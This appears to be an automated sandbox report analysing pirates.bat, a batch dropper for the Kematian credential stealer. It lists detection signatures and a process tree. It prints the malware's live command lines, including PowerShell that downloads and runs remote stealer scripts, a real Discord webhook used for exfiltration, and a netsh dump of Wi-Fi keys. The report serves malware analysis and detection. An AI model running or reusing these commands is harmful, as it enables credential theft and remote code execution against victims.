Windows Analysis Report
pirates.bat

Overview

General Information

Sample name: pirates.bat
Analysis ID: 1467953
MD5: cbcb58dabe241328f335d5710a7d5564
SHA1: ca88012046bb818c24980b8d9c6fef0310dcd662
SHA256: c87215ddba4bbda4ff1c9cf6a8d95012e42d3cecfeb1c22e65f7880e4102388b
Tags: batRUS

Detection

Kematian Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Kematian Stealer
Yara detected PowerShell ScreenShot
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious javascript / visual basic script found (invalid extension)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Wscript called in batch mode (suppress errors)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Steals Internet Explorer cookies
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cscript.exe (PID: 6712 cmdline: cscript //nologo temp.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • cmd.exe (PID: 3120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 2840 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7188 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7212 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • findstr.exe (PID: 7232 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7256 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7288 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7324 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • chcp.com (PID: 7340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • powershell.exe (PID: 7364 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • findstr.exe (PID: 7488 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • net.exe (PID: 7504 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7520 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • powershell.exe (PID: 7536 cmdline: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • doskey.exe (PID: 7684 cmdline: doskey CALL=SHIFT MD5: F6D134052BCB12103B729E4D2EA15B91)
        • attrib.exe (PID: 7700 cmdline: attrib +h +s kematian.ps1 MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 7720 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7728 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7752 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • findstr.exe (PID: 7776 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7800 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7820 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • powershell.exe (PID: 7840 cmdline: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • findstr.exe (PID: 8068 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 8108 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • powershell.exe (PID: 8132 cmdline: powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • wscript.exe (PID: 7248 cmdline: wscript /b MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7296 cmdline: powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7428 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • netsh.exe (PID: 7584 cmdline: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • csc.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • cvtres.exe (PID: 3052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • powershell.exe (PID: 3852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x4344a0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\kematian.ps1 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
C:\Users\user\Desktop\kematian.ps1 | JoeSecurity_PowerShellScreenShot | Yara detected PowerShell ScreenShot | Joe Security
Source | Rule | Description | Author | Strings
00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x3cb95c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_KematianStealer | Yara detected Kematian Stealer | Joe Security
0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_KematianStealer | Yara detected Kematian Stealer | Joe Security
00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x3cc33c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x887354:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source | Rule | Description | Author | Strings
amsi64_7296.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xdc5:$b2: ::FromBase64String(
  • 0x3cc2:$b2: ::FromBase64String(
  • 0x9fb6:$b2: ::FromBase64String(
  • 0x10b57:$b2: ::FromBase64String(
  • 0x3ca8:$b3: ::UTF8.GetString(
  • 0x9f95:$b3: ::UTF8.GetString(
  • 0x10b3d:$b3: ::UTF8.GetString(
  • 0x2bba:$s1: -join
  • 0xa28f:$s1: -join
  • 0xe523:$s1: -join
  • 0xfdb8:$s1: -join
  • 0x1e635:$s1: -join
  • 0x4fda:$s4: +=
  • 0xa282:$s4: +=
  • 0xaeba:$s4: +=
  • 0xb25a:$s4: +=
  • 0xb28f:$s4: +=
  • 0xb2c1:$s4: +=
  • 0xb2f3:$s4: +=
  • 0xe838:$s4: +=
  • 0x17de1:$s4: +=
amsi64_7296.amsi.csv | MALWARE_Win_PWSH_PoshWiFiStealer | Detects PowerShell PoshWiFiStealer | ditekSHen
  • 0x4d78:$s1: netsh wlan export profile
  • 0x16ca6:$s2: Send-MailMessage

            System Summary

            Source: Process started; Author: Jonathan Cheong, oscd.community: Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Source: Process started; Author: Jonathan Cheong, oscd.community: Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Source: Process started; Author: frack113: Data: Command: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" , CommandLine: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" , ProcessId: 7840, ProcessName: powershell.exe
            Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", ProcessId: 7752, ProcessName: csc.exe
            Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Source: Process started; Author: Michael Haag: Data: Command: cscript //nologo temp.vbs, CommandLine: cscript //nologo temp.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2896, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo temp.vbs, ProcessId: 6712, ProcessName: cscript.exe
            Source: File created; Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline
            Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -nop -c "Write-Host -NoNewLine $null" , CommandLine: powershell.exe -nop -c "Write-Host -NoNewLine $null" , CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -nop -c "Write-Host -NoNewLine $null" , ProcessId: 7364, ProcessName: powershell.exe
            Source: File created; Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7536, TargetFilename: C:\Users\user\Desktop\kematian.ps1

            Data Obfuscation

            Source: Process started; Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", ProcessId: 7752, ProcessName: csc.exe
            No Snort rule has matched

            AV Detection

            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
            Source: unknown; HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63775 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63776 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63777 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63778 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:63780 version: TLS 1.2
            Source: Binary string: lambda_methodNet.Http.pdb source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000030.00000002.2347663937.000000C000498000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdb2"{ source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
